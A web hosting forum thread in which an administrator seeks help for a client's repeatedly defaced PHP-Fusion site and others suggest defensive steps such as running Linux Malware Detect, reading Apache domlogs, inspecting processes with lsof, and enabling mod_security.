Account hacked many times.Help urgent!

[filth80]

Hello, the account of one client is hacked many times in a day.He is running last version of php fusion.The attacker replaces the index.php with index.html.I tried chainging the password for ftp, cpanel, etc, but no chance.What can I do to help him?Please help, I need it urgent.

[ModServ]

Install maldet, Scan on it:

For installing:

Code:

wget http://www.rfxn.com/downloads/maldetect-current.tar.gz; tar -xfz maldetect-current.tar.gz; cd maldetect-*; ./install.sh

For scanning:

Code:

maldet --scan-all /home?/USER/public_html

Replace USER with its accoun'ts username or replace the whole path to the path of his files.

[filth80]

Thanks for this, great tool, but sadly, without help.Didn't find anything on scan.

[crazyaboutlinux]

make sure that you scanned properly, we had a same problem since we using it everything is working fine. our DC has installed it & Scanned entire server & found some suspected files, which we got removed from the server thereafter everything is working fine.

[Cindu]

Hello,

Yes, you need to scan the entire server. Also please check whether your /tmp partition is secured and whether there are any scripts running in it.
It will be also good if you enable open base dir security in the server.

[filth80]

maldet --scan-all /home?/?/public_html I used this command to scan the entire server and found nothing.This comand is not good?Open_basedir Protection is enabled.

[Cindu]

Hello,

I could see that the command is correct. Don't you get log file or hits of the infected files. If so it seems there are no vulnerable files in the server. You also need to check the logs of services, how this has been done!

[filth80]

I rescanned and found 2 infected files.I removed them and for now everything seems ok.I'll keep you informed.Thanks for your great help, I appreciate it.

[Cindu]

Hello,

You are entirely welcome and it is good hear that now everything seems to be okay! Keep us informed ! Cheers!

[crazyaboutlinux]

I rescanned and found 2 infected files.I removed them and for now everything seems ok.I'll keep you informed.Thanks for your great help, I appreciate it.

What i told you is maldet is such nice & useful tool.

[filth80]

The hacker attacked again.He is using c99 shell.How can i protect from it?Please help!I'm desperate.

[cPanelTristan]

Have you reviewed the domlogs for the domain to see how this attacker keeps accessing the account? Check the file stamps for the files uploaded, then go through the domlogs at /usr/local/apache/domlogs/domain.com to see what command was passed for which script to get onto the account. Disable that script or have the user update it to a secure version.

Next, are you allowing register_globals to be on? If so, switch this to off for the php.ini file.

Finally, next time you see the processes running for that user, do not kill them if you have been but first run lsof -p on the process and also cat the environmental details to get which script they attacked and where they uploaded files and what they are doing:

Code:

lsof -p PID#

Where PID# is the process PID number for the user that is running perl or whatever script. This will show the libraries and what the script is doing.

Code:

cat /proc/PID#/environ

Again, here PID# is the process PID number for that user for the perl script. This will show the environmental data for the process, which shows what script they passed commands into to upload file(s) onto the account.

If you cannot get the account secured, you probably simply need to have them entirely wipe their account and start fresh, or suspend their account.

Thanks.

[filth80]

register_globals are off.The thing is, I'm not online when the attacker is doing it.I can access the logs but i can't understand them, i mean, everything seems ok.If I install mod_security it helps?And how do i install the rules for mod_security?Thank you.

LE: I found some lines in the logs with the attacker's ip but i don't understand how he did the attack.I found in logs "c99.php" file.If anyone can help me, i'll PM the log to him.Please help.

[cPanelTristan]

Are you killing the processes or checking the processes for that user to see if any are running? When the account is hacked, the very first thing that should be done is to check for suspicious processes by that user:

Code:

ps aux | grep username

Then to run the lsof and cat processes I noted to get the details on the process and what script was hit. You also need to view the timestamps for the file(s) uploaded and go through the domlogs for those specific times.

As for not understanding the logs, what is not understood specifically about them? They normally look like this and are pretty straightforward:

12.12.12.12 - - [16/Feb/2011:13:01:00 -0500] ""GET /scriptname.php?spgmGal=someword%20another%20another&spgmPic=5 HTTP/1.1" 200 14423 "http://www.domain.com/scriptname.php?spgmGal=someword%20another%20another&spgmPic=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 SearchToolbar/1.2"

The 12.12.12.12 is the IP, the date is the date, the GET part is the action and script that had the action performed along with it being HTTP/1.1 protocol, the 200 is the status code (200 is success, you can see a list of codes at this location), the 14423 is the size, the http portion is the url that called the GET action, the Mozilla portion contains the browser and opearating system details.

Finally, mod_security installable in EasyApache (Apache Update) in WHM or using /scripts/easyapache in root SSH for the default rulesets we provide.

[mambovince]

I suggest you get both mod_security and one of the following installed:

ConfigServer eXploit Scanner (cxs)

Linux Malware Detect | R-fx Networks
The latter has a special entry here: Linux Malware Detect - WHTwiki

- Vince